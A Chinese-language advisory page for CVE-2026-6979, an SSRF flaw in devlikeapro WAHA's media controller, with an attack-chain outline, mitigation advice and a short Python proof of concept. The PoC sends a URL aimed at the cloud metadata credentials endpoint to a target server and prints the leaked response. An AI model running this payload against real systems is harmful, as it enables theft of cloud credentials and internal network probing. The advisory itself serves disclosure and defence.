CVE-2026-6979 CVSS 6.3 中危

CVE-2026-6979: WAHA服务端请求伪造漏洞

披露日期: 2026-04-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6979

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

devlikeapro WAHA

漏洞概述

devlikeapro WAHA 2026.3.4及之前版本在src/api/media.controller.ts文件中存在服务端请求伪造（SSRF）漏洞。攻击者可通过操纵API请求处理函数，远程构造恶意请求。由于缺乏对URL参数的有效验证，服务器会被诱导向攻击者指定的内网或外部地址发起请求，造成安全风险。

技术细节

该漏洞位于devlikeapro WAHA的src/api/media.controller.ts文件中，具体源于API请求处理组件对用户输入的URL参数未实施严格的过滤和校验机制。攻击者无需用户交互，仅需低权限即可向受影响的接口发送特制的HTTP请求。服务器在解析该请求时，会直接将攻击者提供的恶意URL作为目标发起网络请求。利用此漏洞，攻击者可以探测内网端口、访问云服务元数据、读取本地文件（若支持file://协议）或利用服务器带宽对第三方发起攻击。由于厂商尚未回应，该风险在当前版本中持续存在，需通过网络层控制进行缓解。

攻击链分析

STEP 1

1. 侦察

攻击者识别出运行devlikeapro WAHA的目标服务器，并确定其版本在2026.3.4及以下。

STEP 2

2. 构造Payload

攻击者构造包含恶意URL（如内网地址或元数据服务地址）的JSON数据，针对src/api/media.controller.ts接口。

STEP 3

3. 发起请求

攻击者向目标服务器发送特制的HTTP POST请求，无需用户交互，仅需低权限账户。

STEP 4

4. 服务端请求

由于存在漏洞，WAHA服务器解析请求并代为向攻击者指定的内部地址发起HTTP连接。

STEP 5

5. 数据回传

内部服务的响应内容被WAHA服务器返回给攻击者，导致敏感信息泄露或进一步的内网探测。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-6979 PoC Example for WAHA SSRF
# Targeting the vulnerable media controller endpoint

target_url = "http://target-ip:port/api/media/fetch"  # Replace with actual target

# Malicious payload pointing to an internal service (e.g., AWS metadata)
# Can also be used to scan internal ports like http://127.0.0.1:22
malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

payload = {
    "url": malicious_url
}

try:
    print("[*] Sending SSRF payload to WAHA media controller...")
    response = requests.post(target_url, json=payload, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request sent successfully. Check response for sensitive data.")
        print("[+] Response body:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

devlikeapro WAHA <= 2026.3.4

防御指南

临时缓解措施

建议立即通过防火墙或安全组限制应用服务器的出站流量，仅允许访问必要的外部API。同时，在应用层面对所有用户输入的URL进行格式校验，禁止请求私有IP地址段（如127.0.0.1, 192.168.x.x, 10.x.x.x, 172.16.x.x）和非HTTP/HTTPS协议。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6979
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6979
3 Details https://www.cvedetails.com/cve/CVE-2026-6979/
4 VulDB https://vuldb.com/cve/CVE-2026-6979
5 Link https://github.com/wing3e/public_exp/issues/36
6 Link https://vuldb.com/submit/795416
7 Link https://vuldb.com/vuln/359522
8 Link https://vuldb.com/vuln/359522/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表